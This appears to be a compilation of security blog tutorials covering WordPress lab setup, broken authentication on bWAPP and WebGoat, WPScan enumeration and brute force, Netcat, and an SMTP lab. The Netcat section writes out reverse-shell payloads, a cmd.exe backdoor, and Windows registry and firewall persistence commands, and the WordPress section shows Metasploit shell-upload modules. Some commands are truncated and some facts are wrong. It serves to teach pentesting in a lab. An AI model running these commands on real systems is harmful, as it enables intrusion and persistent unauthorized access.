volumes:

    db_data: {}




Now the docker image in detach mode using following command

docker–compose up -d




After the doing all the configuration step-by-step, now access the localhost on port 8000 that will be hosting your WordPress Docker image and configure your WordPress site as done in previous section.


You get the dashboard where you can write your content that to be posted on the website. But here we need to make some changes inside the setting so that the wordpress after installation it will work properly. Thus, enter your localhost ip address with port number on which your docker image is running.



And Finally, it is over here, and your WordPress is completely ready to go but over port 8000 as shown here 😊.




Install Wordpress on Windows Platform


Installation of WordPress is also very easy as compared to ubuntu, because to fulfil the prerequisites of LAMP Server we can use XAMPP that will completed the all required dependency like apache and MySQL for the  WordPress.


Now download the extract the zip file of WordPress inside the /htdocs folder in /xampp folder in C-Drive.


Now open the PHPMYADMIN in web browser by accessing /localhost/phpMyAdmin and create the database for Wordpress to stored its data.



Now in order to configure wordpress, explore the /localhost/wordpress/ and then enter the detail for database.

Note: By Default, XAMPP DB_User is root and DB_Pass is empty

So as per XMAPP database configuration we entered following details in the given record.


Now again repeat the same step as done in above section.




You get the dashboard where you can write your content that to be posted on the website.



To make it vulnerable WordPress platform in order to perform penetration testing I install some vulnerable plugin as highlighted in the image.

To know how we can go do WordPress Penetration testing read thisarticle.



Comprehensive Guide to Broken Authentication

0
0

Does just keeping a secure and a strong password can really protect you? Today in this article we’ll learn, how an attacker analyze and take over the user’s account that have been logged in inside some weakly authenticated web-application with an immune password.
Table of Content

·         Introduction

·         Sessions

·         Cookies

·         Impact of Broken Authentication

·         Broken Authentication

o   Credential Stuffing

o   Insecure Web-Applications

§  Insecure Login forms

§  Logout management

o   Bypassing Forget Password Option

·         Improper Session Management

o   Administrative Portal Login

o   Session Hijacking

§  Using Browser’s Plugin

§  Using Burpsuite

·         Mitigation Steps


Introduction

Authentication is the process of validating a user who is claiming to be a genuine one. Thus in a web-application, password plays the major role in the authentication phase. In order to get the desired access, the user have to enter his username and password, further these credentials are sent to the server for the authentication process. However the server checks them into its database and if found valid, it generates a session and pass it to the browser in the form of Cookie Session ID.



But what if an intruder bypasses this authentication process either by guessing up the username and passwords or even by capturing up an active session of any particular user. Thus this scenario is considered as Broken Authentication where the authentication and session management of the web-applications are often not implemented correctly, leading the attacker to gain an unauthorized access to the user’s data.



Form the above picture you can see that the attacker is trying to get into the web-application by the credential stuffing method, where he is having a bunch of breached passwords which thus in-turn helps him to gain an authenticated session.

In order to explore more, let’s take a deep dive and learn about the sessions and the cookies concepts.


Sessions

When a user made any changes in a web application like a sign in or sign out, the server does not know who that person is. In order to solve this issue, sessions were introduced, which holds the information of a single user that can be reused across several web pages over a particular web-application.

Example: login ID user name and password.

Therefore some code are generated with a unique identification number in the form of hash for that specific session which is a random string of 32 hexadecimal numbers such as 5f7dok65iif989fwrmn88er47gk834 and thus it is known as sessionID.


Cookies

A cookie is a small piece of data similar to the sessions, they are sent by the server to the browser. Thus this data is stored on the user’s computer while he/she is browsing. Cookies have a short time period due to their preset expiry date and time.

Cookies are classified into major categories but the most common one is –

Session Cookie:

These cookies dies when the browser is closed because they are stored in the browser’s temporary memory. They’re majorly used for the e-commerce websites so the user can continue browsing without losing what he put in his cart and finally able to checkout. The session cookie are deleted only when they are on their expiration date or when a user shuts down the bowser.


Impact of Broken Authentication

Broken Authentication is the vulnerability which allows the attacker to gain the user data without proper authentication. This vulnerability arises in the web application where the sessions are not properly sanitized. Therefore it stood as the second most critical vulnerability in the OWASP top10 having “a CVSS Score of 8.8”.

However the Broken Authentication vulnerability has been majorly reported under

1.       CWE- 287 Improper Authentication

2.       CWE-345 Insufficient Verification of Data Authenticity

3.       CWE-522 Insufficiently Protected Credentials

To learn more about the other CWE categories for Broken Authentication and Session Management click here.


Uptill now you might be clear with the concept of authentication and aware with the fact that how crucial the sessions are. So now it’s time to exploit and analyze these vulnerabilities over the most vulnerable platforms i.e. bWapp and WebGoat.


Credential Stuffing

During the major data breaches, it is easy for the attackers to grab a list of commonly used usernames and passwords. Thus using these different pairs, they are able to gain the actual user’s credential of a particular web-application. Credential stuffing somewhere also known as bruteforcing or fuzzing.

Therefore we’ll try to bypass this high security captcha login using one of the best web-fuzzing tool i.e. Burpsuite.

Boot in your burpsuite in order to capture the ongoing HTTP request, by setting up the proxy server at the localhost and enabling the intercept option in the proxy tab. 



As soon as you grab the request just send it directly to the intruder by a simple right click on the proxy tab or either by pressing Ctrl +I.




Now it’s time to configure our attack!!




As soon as you get the confirmation with the Host and the Port, just switch to the Position tab there right at the target tab.

Choose the Attack type to Cluster Bomb, further add up the attack position by simple clearing all the preset positions with the Clear $ button and adding the news positions with the Add $ button.


From the above image you can see that, I’ve set the attack position over the login and the password fields, where my dictionaries would work.


Here in the Payload section, we’ll be adding up our dictionaries.

Choose the Payload Set 1 and 2 simultaneously one after the other and include our lists in both of them by simply clicking on the Loadbutton.

We’re almost done, now just click on the Attack button and wait for the response.



From the below image you can see that our attack has been started and there is a fluctuation in the length section and our lists are working in the way we want.

I’ve double clicked over the length section in order to check the lowest value first.



As soon as I choose the 48th Request due to the only fluctuated value, I was able to see that the payload 1 and 2 with bee and bug inputs respectively are giving a successful loginin the Response section.


Therefore I was able to get into the web-application by entering the credentials as bee : bug.




Insecure Login Forms

Many web developers tries to trick their clients by setting up the username and password into the html code with the font color as “white” at the username and password field only.

Let’s check whether this login form is having the same issue or not.

Simply right click anywhere on the form screen and choose View Page Source option.



As we analyze the HTML form code, I was able to determine the username and the password values as tonystark and I am Iron Man hidden with the white font.




Insecure Logout Management

This is one of the most common vulnerability, where the developers simply setup the hyperlinks of the logout page at the logout text without having any concern about the generated session.

I’ve set the “Choose your bug” option at “Broken Authentication –Logout Management”. From the below image you can see that as I’ve clicked on the OK option in the popped up confirmation field. Thus further I had been redirected to logout page.


Now let’s try to simply click on the back button.



Great!! We are back into the account again. That means we were just redirected to the new page but our session cookies were not expired yet.


Let’s check it out, how this all happens at the backend.



From the above image we can see that the developer had simply set ”ba_logout_1.php” as the Hypertext Reference to the “here” text.


Bypassing Forget Password Option

Forget Password is the most common feature of every web-application. The majority of applications use it, in order to send a security question or a reset password link to their users at their registered email addresses. But what, if we exploit this feature and change the credentials of the users without their concern or even without capturing anything from their browsers?

Let’s try how we can exploit it!!

I’ve logged in into the WebGoat’s platform by creating a new user account as hackingarticlesin order to exploit this vulnerability. To install and setup WebGoat click here.

From the left-hand side panel select Broken Authentication following with Password Reset field.

Thus selecting the 6thoption from the top, we’ll be redirected to our desired task.



Dragging to the bottom we’ll find the Account Access form, below there we can find a “forgot password” option.



As soon as we click on it we’ll be redirected to the “Forgot Your Password” page.


Now, it’s time to start our attack.

I’ve entered hackingarticles@webgoat-cloud.orgas the desired email address.

Note:

You can enter any domain rather than webgoat-cloud.org, but the name should be the one you set as the username for your account.





From the above image you can see that we got the response as “An email has been send to hackingarticles@webgoat-cloud.org”


Now let’s surf the WebWolf’s webpage and enter the same credentials that you have used while logging into WebGoat






From the below image, you can see that I’ve received an email with a reset link in order to setup the new password.


Now it’s time to break and get into the victim’s account i.e.“tom’s account”.

Back to the WebGoat server we’ll write the tom’s email address as tom@webgoat-cloud.org. But this time we’ll capture the request before sending it to the server i.e. tune in you burpsuite by enabling up the proxy and the intercept option.



As soon as we capture the “Post Request”, we’ll send it all to the repeater, by clicking on the right hand side and selecting the Send to Repeater option.


Now we’ll manipulate the request and send it to our server i.e. the server we set at 192.168.0.11:9090.



From the above image over the right hand side in the window you can see that, “An email has been send to tom@webgoat-cloud.org. But this email has actually been send over our WebWolf server.


Let’s get back to our “WebWolf” application and check what we have received as in our Incoming Request.


From the above image you can see that I’ve successfully manipulated the WebGoat server, which send the request over my account.

Copy the unique Id as highlighted, which we will use in our future case.


We’re now almost done, go back to the inbox of “hackingarticles@webgoat-cloud.org” and open that reset link that we got earlier.


From the above image you can see that, in the URL section, we’re having a unique ID here too.

Let’s change this unique ID with the one we copied earlier.



Wooahh!! We are redirected to a new “Reset your password” page, seems like we’re changing the Tom’s credentials.

I’ve now set the password here as “tomandjerry”. And fired the “SAVE” button.


Let’s check whether we’re able to change the tom’s credentials or not.

Go back to the WebGoat web-application and select the option to “Account Access” and enter the following credentials:

tomandjerry



Great!! We’ve successfully changed the Tom’s password just with his email account, without knowing who is tom.



Improper Administrative Login

Administrative logins are considered as one of the most important and the most crucial vulnerability, it occurs due to unsanitized session generated from the server’s end.

Let’s try to exploit this vulnerability and get into the web-application with the administrative privileges.


Boot back into your bWapp server and select “Session Management – Administrative Portals” in the “Choose Your Bug” option keeping the security at low.


From the above image you can see that after the “.php?” we’ve got “admin=0”, let’s manipulate this but “admin=1” and check out the grabbed result.



Simple!! We’ve unlocked this page with the administrative rights.


Let’s try to increase up the level and set it to “medium”, now checking the same in the URL, we won’t be able to find anything. So is this vulnerability patched?



Wait, let’s try to capture its cookies and analyze them.



Look there it is, the flaw is still the same, but this time it is in the cookies. So now let’s check whether our manipulation will work or not?

I’ve again manipulated the “admin=0” to “admin=1”




From the below image you can see that we’ve successfully unlocked the webpage again with some simple manipulations.


Session Hijacking

Uptill now we all are aware with the fact that for every different user there is a unique session ID generated, thus when an attacker sniffs the network traffic via man-in-the-middle attack or via Cross Site Scripting and thereby steals up the session ID or the session tokens of the legitimate user’s authenticated session in order to get an unauthorized login. This methodology is known as Session Hijacking.

The idea about session hijacking would be more clear from this image.



Here the user enters his credentials into the web-application, thus application sends them to the server for authentication. Therefore as soon as the credentials were found valid, the server generates a session and shares it to the browser, such that the user do not need to enter his credentials everytime for every single page he requests for.

But the attacker sniffs the network and steal up these freshly generated session IDs before they were send to the user. Now the attacker just need to send these session ID’s to the web server, server tries to match them with its database stored session ID. If they both are matched thus the server servers the attacker will HTTP 200 OK reply and the attacker will get a successful access without submitting proper Identification.


So it’s time to play with these sessions and hijack some accounts.


Session Hijacking using Browser’s extensions


Isn’t it great if you could simply get into other’s account without bruteforcing or resetting the password or by not finding any flaws in the web-application?

In order to perform all this, we’ll be using a simple browser extension i.e. “Cookie Editor”, which enable us to import and export the browser generated cookies by simply coping them into our clipboard, which can further be used in getting an authenticated access. You can install this extension from here.


Let’s Start!!

From the below image you can see that I’m having this Cookie Editor enabled in my browser and I’ve logged in inside bWapp as “Hackingarticles : 123”,now from the options provided I’ll click on the “Export” button in order to export all the cookies of this particular session.



Since I’ve successfully exported the user’s cookies now it’s time to import them into the attacker’s machine.

From the below image you can see that, the user “bee” is active with an enabled cookie editor extension.


Now let’s try to import these cookies into the attacker’s browser.



As I hit the “enter” button the exported cookies of the user hackingarticles will be imported directly into the browser where the user bee  resides.

So everything is up now, just simply refresh the browser and there it goes. From the below image you can see that we’ve successfully captured the hackingarticles sessionwith just 3 clicks.




Session ID exposure in URL

Many times the developers fails to manage the privacy of the web-applications by leaving some basic flaws such as disclosing the session ID in the URLs, which allows the attacker to steal these session id’s by simply monitoring up the network and manipulate them in order to exploit the authenticated user to compromise his account.


For this exploitation, we’ll be using the bWAPP, selecting up the “Choose your bug” option to “Session Management – Session ID in URL” and setting the security level to “low”.


From the above image you can see that the “PHPSESSID=” of the user “Hackingarticles” is displayed into the browser’s URL, just copy the same into a text file.

Similarly we’ll copy the “PHPSESSID=” from the user “Bee”and paste it into the same text file.



Form the above image you can see that both these session ID’s are different.

Thus, it’s time to exploit this vulnerability.

In the Bee’s account we’ll go to the “Change Password” option, and will try to change the password.

But before hitting up the “change” button, we’ll run our favorite tool “burpsuite” and capture the ongoing HTTP Request.



From the below image you can see that we’ve successfully captured the HTTP request, and there we are again presented with the “PHPSESSID”.



Now we’ll be sharing this captured request to the repeater by simply doing a right click and choosing the option as “Send to repeater”, and further will check its generated response.



Time to manipulate this session ID with the one we have captured form the “Hackingarticles” user

From the above image, in the response tab over the right hand side of the window you can see that the user have been changed from bee to Hackingarticles as we hit the Sendbutton.


We’re almost there, just change the “PHPSESSID=” with the one that we’ve used in our previous step, in the Proxy tab.


As soon as I hit the Forward button, I will be redirected to a new web page.



Great!! We are back into Hackingarticles account by simply manipulating up the SessionID.


Mitigation Steps

1.       Developers should setup the Session ID’s in the most encrypted way they can and even with an appropriate session timeout.

2.       The client’s or the Users should use multi-factor authentication and even follow-up with the strong password policies in order to increase the password complexities.

3.       Session ID’s should not be stored in URL’s.

4.       The user’s should change their passwords on a regular basis.



WPScan:WordPress Pentesting Framework

0
0

Every other web-application on the internet is somewhere or other running over a Content Management System, either they use WordPress, Squarespace, Joomla, or any other in their development phase. So is your website one of them? In this article, we’ll try to deface such WordPress websites, with one of the most powerful WordPress vulnerability Scanner i.e WPScan.

Table of Content

·         Introduction

·         Enumerating the WordPress web-application

o   Version Scanning

o   WordPress Themes

o   WordPress Plugins

o   WordPress Usernames

o   All in a single command

·         WordPress Exploitation

o   Bruteforce Attack using WPScan

o   Shell Upload using Metasploit

o   Vulnerable Plugin exploitation

·         Scanning over a Proxy Server

·         Scanning with an HTTP Authentication enabled


Introduction

“WordPress is one of the most powerful CMS platform, which covers about 35% of the total share of the websites over the internet”. Thus in order to enumerate such web-applications, we’ll be using WPScan” - which is a black box vulnerability scanner for WordPress, scripted in Ruby to focus on different vulnerabilities that are present in the WordPress applications, either in its themes or plugins.


Well, WPScan comes preinstalled in Kali Linux, SamuraiWTF, Pentoo, BlackArch; which scans up its database in order to find out the outdated versions and the vulnerabilities in the target’s web application.


Let’s check out the major things that WPScan can do for us:

o   Detect the version of currently installed WordPress.

o   Can detect sensitive files like readme, robots.txt, database replacing files, etc.

o   Detect enabled features on currently installed WordPress server such as file_upload.

o   Enumerates the themes, plugins along with their versions and tells if they are outdated or not.

o   It even scans up the web-application to list out the available usernames.


Before going deeper, I suggest you to check out our previous article where we’ve discussed the “Multiple ways to setup a WordPress Penetration Testing Lab”.


Let’s start!!


As discussed earlier, WPScan is installed by default in the Kali Linux machines, so let’s check out the default usage options, by simply firing the following command in the terminal.

wpscan -hh



Scanning the WordPress version of the target’s website

As we were presented with the default options, let’s now try to do a basic scan over the vulnerable WordPress web-application that we’ve set up in our earlier article.



Type the following command to scan the WordPress application and its server.


From the below image you can see that it dumps up everything it could – the WordPress version, the Apache server, and even it also found that the upload directory has directory listing enables which means anyone can browse to “/wp-content/uploads” in order to check out the uploaded files and contents.



Enumerating WordPress Themes

Themes plays an important role in any CMS web-application, they control the general look & feel of the website including its page layout, widget locations, and the default font and color preferences.

WPScan uses its database which contains about 2600 themes to check the vulnerable installed one over the target’s. 


In order to check the installed themes of the target’s WordPress web-application, type following command:

wpscan --url http://192.168.1.105/wordpresws/ -e at


The “–e” flag is used for enumeration and the “at” flag returns “all themes”.

You can even use the other flags such as “vt”, to list only the vulnerable themes.


Thus running the above command, we will be presented with the installed themes with its version.




Enumerating WordPress Plugins

Plugins are the small piece of codes, that when added to a WordPress web-application, boost up the functionalities, and enhance the website’s features.

But these plugins may sometimes cause great damage to the web-application due to their loosely written codes.

Lets’s check out the installed plugins on our target’s web-application by executing the below command:


wpscan --url http://192.168.1.105/wordpress/ -e ap


Similar to the themes, we can also check the vulnerable plugins by using the “-vp” flag.



After waiting for a few seconds, WPScan will dump our desired result. From the below image, you can see the plugins “mail-masta” and “reflex-gallery” are installed over our target’s website. As a bonus, we even get the last update and the latest version.



Enumerating WordPress Usernames

In order to list out usernames of our target’s website privileged users, execute the following command:



The flag “u”  will grab all the usernames and will present a list on our screen.



As WPScan completes its work, we’ll find a list of all the users with their user IDs, in accordance with how it grabbed them.



Enumerate ALL with a single command

Does WPScan give us that privilege to scan up the web-applications to check everything in one go, whether it is its version, the installed themes, or the plugins?


Let’s check this out!


Fire up the following command to grab everything we scanned above for our target web-application.

wpscan --url http://192.168.1.105/wordpress/ -e at –e ap –e u


–e: at:enumerate all themes of targeted website

–e: ap:enumerate all plugins of targeted website

–e: u:enumerate all usernames of targeted website



 



Brute-force attack using WPScan

With the help of usernames which we enumerated earlier, we can create a wordlist of all the users and can try a brute-force login attack using the default password list as “rockyou.txt”.  You can learn more about cracking the WordPress logins from here.


From the below image you can see our designed wordlist.



Let’s now try to exploit the website by defacing its login credentials using the following command:

wpscan --url http://192.168.1.105/wordpress/ -U user.txt –P /usr/share/wordlists/rockyou.txt


The –U and the –P  flags are used to set up the username list and the password list respectively.



It will start matching the valid combination of username and password and then dumps the result, from the given image you can see we found the login credentials.



Great!! We got the admin credentials as “admin : jessica”. Let’s try to get into the application’s dashboard with them.



Shell Upload using Metasploit

Isn’t it great if you get the target’s shell?

Run the following commands in order to get a meterpreter session of our target’s web-application.

msf > use exploit/unix/webapp/wp_admin_shell_upload

msf exploit(wp_admin_shell_upload) > set rhosts 192.168.1.105

msf exploit(wp_admin_shell_upload) > set username admin

msf exploit(wp_admin_shell_upload) > set password jessica

msf exploit(wp_admin_shell_upload) > set targeturi /wordpress

msf exploit(wp_admin_shell_upload) > exploit


This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. And finally, give us the meterpreter session of the webserver.




Vulnerable Plugin Exploitation

Here in our website, we foud a vulnerable plugin i.e. “slideshowgallery”which contains an authenticated file upload vulnerability thus in order to exploit it,we will be using the following module which will offer us a reverse shell.


use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit(wp_slideshowgallery _upload) > set rhost 192.168.1.105

msf exploit(wp_ slideshowgallery _upload) > set targeturi /wordpress

msf exploit(wp_ slideshowgallery _upload) > set username admin

msf exploit(wp_ slideshowgallery _upload) > set password jessica

msf exploit(wp_ slideshowgallery _upload) > exploit


From the below image you can see that we’ve successfully captured our target’s meterpreter session.



Scanning over a Proxy Server

Is is possible to scan a WordPress web-application running over a proxy server?

Many web-applications use Proxy servers in order to be secure, but WPScan gives us this advantage to scan such web-applications using the “--proxy” flag.


Let’s check it out how:


Our WordPress web-application is now running over a proxy server with a “port number as 3128”. You can learn more about how to setup a proxy server from here.



Now if we try to scan it with the default usage option we’ll get an error and our scan will halt. So let’s try to use the proxy port in order to scan the web-application.


Simply run the following command to bypass this proxy server:


From the below image you can see that we are back into the scanning section.




Scanning with an HTTP Authentication enabled

Many websites enables HTTP authentication so that they can hide some essential and critical information from the unauthenticated users.


We have also set a similar validation over our website with the credentials as “raj : 123”. To learn more about HTTP authentication click here.


From the below image you can see that when we tried the normal scan, we got an alert as “Please provide it with --http-auth”.

Thus following this alert, we’ve used the --http-authand had entered our credentials.

wpscan --url http://192.168.1.105/wordpress/ --http-auth raj:123


And there we go, our scan has been started now.


Comprehensive Guide on Netcat

0
0

“Whether it is port scanning or to get a reverse shell, everything is possible with Netcat.Today in this article we will be exploring one of the most commonly used network utility and will learn how the other frameworks reinforce “Netcat” in order to generate a session.


Table of Content

·         Introduction

·         Why Netcat?

·         Netcat Basic command

·         Port scanning over Netcat

o   TCP Scan

o   UDP Scan

·         Creating a netcat chat session

·         Banner Grabbing

·         File transfer

·         Reverse Netcat Shell Exploitation

·         A listener at a randomized port

·         Grabbing the HTTP banner

·         Generating a backdoor

·         Windows 10 persistence through Netcat

·         Msfvenom Payload with Netcat


Introduction

Netcat technically used as “nc” - is a network utility that uses the TCP and UDP connections in order to read and write in a network. It can be used by both the attackers and the security auditors.

Counting in the attacking scenario, this cross-functional tool can be driven by scripts which makes it quite dependable and if we discuss the security section, it helps us to debug and investigate the network.


Why netcat is such dependable, that it can do everything whether it is port scanning, banner grabbing, transferring a file, or even generating a reverse connection?


Let’s check out the major netcat features and unlock this question.


1.       It acts as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services.

2.       It redirects the TCP/UDP/SCTP traffic to other ports or hosts by acting as a SOCKS or HTTP proxy such that the clients specify their own destinations.

3.       Netcat can even connect to destinations through a chain of anonymous or authenticated proxies.

4.       Encrypts communication with SSL, and transport it over IPv4 or IPv6.

5.       It acts as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server.


So uptill now, you might be aware of all the features that Netcat has, which makes it unique and simple.

Let’s try to dig deeper and explore what we can more do with this great tool.



Netcat basic command

“Help” or sometimes its “h”, this flag drops out every possible option that a tool can do for us. To start with netcat, we’ll be using the most basic help command i.e. :


nc –h



Port scanning over Netcat

Netcat can be used as a port scanner, although it was not designed to function as. To make it worth as a scanner, we need to set the “-z” flag, which tells netcat, to scan listing daemon without sending any data. This makes it possible to understand the type of service that is running on that specific port. Thus netcat can perform both the TCP and the UDP scan, let’s check it out how:


TCP Scan


nc –v –n –z 192.168.1.105 21-100


    [-v]: indicates Verbose mode

    [-n]: indicates numeric-only IP addresses

    [-z]: indicates zero -I/O mode [used for scanning]


In order to complete this scan, we need to specify a range of ports. From the below image you can see that I’ve mentioned a port range of 21-100, which will dump the running services over the target’s machine.




UDP Scan

We can even scan the UDP ports in a similar way we scanned the TCP ones. Here we’ll be using the “–u” flag which will invoke the UDP mode.


nc –vzu 192.168.1.105 161


In this scenario, we have mentioned the port number rather than the range. From the below image you can see that we’ve captured the running “snmp” service.



Creating a netcat chat session

Netcat can also be used to chat between two users. But before that, we need to establish a connection. To setup this all, we’ll be using two devices - one will play the role as an initiator and the other one will be a listener. As soon as this connection is established, the communication can be done from both ends.


Let’s check out this scenario, where two users with different operating systems communicate with each other over a Netcat established connection.

Initially, kali’s root user needs to setup his netcat “listener” over a specific port, to build up a network connection. Run the following command to do so:

nc –lvp 1234


here,

[l]: Listen Mode

[v]: Verbose Mode

[p]: Local Port


Now it’s time to setup an initiator, we’ll be doing this from the Ubuntu’s root user, by simply providing the IP Address of the system where we have started the listener followed by the port number.


nc 192.168.1.109 1234



From the below image you can see that the connection has been setup and both the machines are now able to communicate with each other.




Banner Grabbing

Banner refers to a text message received from the host with information about the open ports and services along with their version numbers.

Run the following command to grab the target’s ftp and ssh banners:


nc 192.168.1.105 21

nc 192.168.1.105 22



File Transfer


Netcat offers us an opportunity to transfer files from one device to another over a network.

Let’s follow up with a scenario, where a kali user exempts to transfer his files to a user at an Ubuntu machine.

From the below image the user over the kali machine sets up a listener at port number 5555, and shares file.txt using the “<” parameter.


nc –lvp 5555 < file.txt



Now the user sitting at the Ubuntu server will download this file by running the following command.


nc 192.168.1.109 5555 > file.txt


From the below image you can see that the Ubuntu user has successfully grabbed the file.txt  file from 192.168.1.109which is nothing but the kali user’s IP



Reverse Netcat Shell Exploitation

As discussed earlier netcat can perform anything, so now we’ll try to exploit the target’s machine with the help of “msfvenom” to create a payload and will setup a netcat listener to grab a session.


Let’s try to create a payload using the following command:


msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=6666 R


The “R” flag is used to generate a raw payload which will be over our screen.



From the above image, you can see that our payload is ready, now its time to trigger it over our victim’s server.


Open the Ubuntu machine and type this payload in the terminal. Before firing it up, get back to the attacker’s machine(kali linux) and setup the netcat listener over there by using the same port number that you used while generating the payload.



From the below image you can see that, as soon as the victim runs the payload, we’ll got the session.



There are many times when the security gets high and we fail to grab the session using this method, but there is another way to get a reverse shell.

Before that, setup a netcat listener at port 443:


As the listener boots in, just execute the following commands in the target’s machine :

mknod /tmp/backpipe p

/bin/sh 0
/tmp/backpipe


This will help you to bypass the security and offer you a netcat session.



From the below image you can see that we’ve successfully captured the victim’s shell.



A listener at a randomized port

There are chances when we aren’t able to decide the very own port to set up a listener or to establish a netcat connection. Well, netcat has a special “–r” flag which will provide us randomized local port.


nc –lv –r


From the below image you can see that our listener has been started at 38931.




Grabbing the HTTP banner

HTTP banners are now can’t be fetched easily, as they contain the server’s information. But we can use netcat to capture information about any webserver.

Simply run the following command in order to manipulate the target’s server and check what we have grabbed.


printf “GET / HTTP/1.0\r\n\r\n” | nc 192.168.1.105 80

Great!! From the below image you can see that I’ve successfully captured the HTTP banner and we are presented with the Apache server.



Generating a backdoor


A system’s backdoor welcomes us every time with open hands whenever we knockback.

Thus we’ll try to generate such a similar backdoor over the target’s windows machine, which allows us to get in, at any time when we come back.


Let’s setup a listener over our kali machine first:

nc –lvp 4444


Now execute the following command over the victim’s windows command prompt to create a backdoor.


nc.exe 192.168.1.109 4444 –e cmd.exe



Time to get back to our attacker’s machine. From the below image you can see that we are into the victim’s command shell.





Windows 10 persistence through Netcat

Persistence plays a major role in an attacker’s life. So let’s try to create a persistent backdoor using netcat and Metasploit framework, on the host machine which we have compromised.


From the below image you can see that I’ve grabbed a meterpreter session of a Windows 10 machine.

Now upload netcat.exe file into system32in the victim’s pc by using the following command:


upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32



Now set up netcat to a listener at any random port say 4445, open the port on startup and make the connection.

Use the following command:


reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v Netcat –d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'



On a successful netcat connection, we will get the reverse_shell of the victim’s PC.


Now its time to add up a new rule to firewall named as ‘netcat’in which the inbound connection will allow for port 4445 by using the interactive cmd prompt running a command called netsh.

Type the following command:

netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445


Let’s check out the operational mode and the port status by running up the following command:


netsh firewall show portopening



So with all that, we are done. Now when the victim reboots the system again, we will get the netcat shell. Run the following command to connect our netcat backdoor via port 4445.


nc -nv 192.168.1.105 4445

Great!! We’ve successfully maintained the permanentbackdoor, now whenever the victim boots in we’ll always have its session. To learn more about Windows persistence click here.



Msfvenom Payload with Netcat

Until now we’ve learned everything about Netcat, from its basic things to its advanced ones. So let’s learn how we can connect with the victim through our Netcat_shell using a msfvenom payload.


Fire up the terminal and run the following command to generate a .exepayload


msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.104 lport=3333 –f exe > shell.exe



Now turn on the Netcat listener over port 3333.


Share this generated payload with the victim, as soon as he/she opens it up you’ll get the reverse connection.


SMTP Pentest Lab Setup in Ubuntu (Port 25)

0
0

Wonder, how your email travels from one device to another? Today in this article, we’ll analyze how an SMTP server is responsible for setting up a connection between two different users in order to share an email over the desired network.

Tables of Content

·         Understanding the SMTP Protocol

·         Introduction to Rain Loop

·         Adding a Hostname and Domain name

·         Postfix installation

·         Configuring Postfix

·         Installation of Dovecot

·         Setting the lab for Dovecot

·         Installation of Rain Loop


Understanding the SMTP Protocol

SimpleMailTransferProtocol abbreviated as “SMTP”- an application layer TCP/IP protocol, which run over port 21 in order to allow the applications to transfer an email to and through networks by following up a method called “inventory and forward”.


This protocol closely works with something called as Mail Transfer Agent(MTA) in order to send your communication emails to the correct computer and inbox.


SMTP sets out and guides, how your email travels to another device from the MTA of your device to the MTA of others. Using the above-mentioned "store and forward" function, the message will travel from your device to its destination in steps. At each step, the Simple Mail Transfer Protocol will do its job.


Let’s check out the other different protocols that the client applications use in order to retrieve messages.

·         POP3 which stands for “Post Office Protocol 3”- is an Internet standard application layer protocol used by the local email clients to access emails from a remote server over a TCP/IP connection. It runs over port 110 to capture the emails.

·         IMAP termed as “Internet Mail Access Protocol”which is also an Internet standard protocol used by email clients to retrieve email messages from a mail server via a TCP/IP connection. It uses port143 to receive emails.


Introduction to Rain Loop

Rain loop is a simple PHP scripted, web-based email client application, that allows the users to access their emails from a single web interface from all their external mailboxes. This is a perfect way to get all of your external mails like Google, Yahoo, and other SMTP inboxes on your own server.


Let’s check out how we can set up an“SMTP mail server” over our Ubuntu 18.4” machine.




Adding Hostname and Domain Name

Initially, we need to fixourhostname.Simply open the host file with “root privilege” to add up a hostname and domain name using the following command:

sudo nano /etc/hosts

Now add the domain name to the host file and save it.



To modify the default hostname, just open the hostname file with the root privileges again. Now rewrite and save the default hostname as "ignite", which we have listed in the host file earlier.



Now check the hostname and domain by typing the following command and in order to be sure with the changes you had made.

hostname

hostname -f



Postfix Installation

Postfix is Ubuntu's default “Mail Transfer Agent” (MTA). This resides in the central repository of Ubuntu, such that it could get all the security updates. Over this section, we’ll learn how to use a safe link to install and configure postfix and set it up as an SMTP server.


apt-get install postfix



For the Postfix configuration, you will be popped up with a dialog box, where you must select the “Internet Site” as a general type of mail configuration as shown in the below image.




Enter the domain name as (mail.ignite.lab), which we have saved as a machine mail name within the host file, and further hit the OK tab.





Configuring Postfix

Postfix was already using the “Maildir” format. It is thus set with the home mailbox = Maildir/ parameter in /etc/postfix/main.cf. Open main.cffile and make the following changes in it and further save that.

sudo nano /etc/postfix/main.cf

Add subnet IP my networks = 127.0.0.0/8 192.168.1.0/24

Enter inet_protocols = ipv4

Add new line home_mailbox = Maildir/



After making changes to the configuration file, simply restartthe postfix service by:

service postfix restart

Now type the following command to view the list of the open ports to listen for incoming connections. You can observe the STATE of port 25 from the below image.

netstat -tnl



Installation of Dovecot

Dovecot is a “Mail Delivery Service”, written mainly with some security sections in mind. This delivery service majorly supports the following mailbox formats i.e. mbox or Maildir.

Therefore in this section, you’ll learn “how to set up an IMAP or a POP3 server”.  Run the following command to move further in the league.

apt-get install dovecot-imapd dovecot-pop3d



Dovecot configuration setting

Open “10-auth.conf” file through given below path and make the following changes in it as shown in the given image then save it.

sudo nano /etc/dovecot/conf.d/10-auth.conf

disable_plaintest_auth = yes



Change auth mechanisms = plain login



Open the 10-mail.conf file with-

sudo nano /etc/dovecot/conf.d/10-mail.conf

Now make the following changes in this as shown in the given image and then save it.

mail_location =  maildir:/home/%u/Maildir



Further open the 10-master.conf file through the given path and make the ammendments:

sudo nano /etc/dovecot/conf.d/10-master.conf

port = 143

port = 110



Time to give permissions for unix_listener auth-user DB with:

Mode = 0600

User = postfix

Group = postfix



We’re are almost there, just restart the dovecotservice by running up the following command-

service dovecot restart


Scan the running service by using netstat –tnl, to check the available ports to listen to the incoming connections

From the below image, you can observe the STATE LISTEN for the ports 110 and 143.



Installing Rain Loop

As everything is now at its position. Its time to install Rain Loop. Without the need for a database, Rain Loop comes with decent performance, easy installation and update and support for IMAP and SMTP protocols (SSL, STARTTLS), sieve scripts support, Facebook, Google, Twitter, and Dropbox integration and much more.

Let’s start!!

Run the following command in Ubuntu to install Rain Loop.

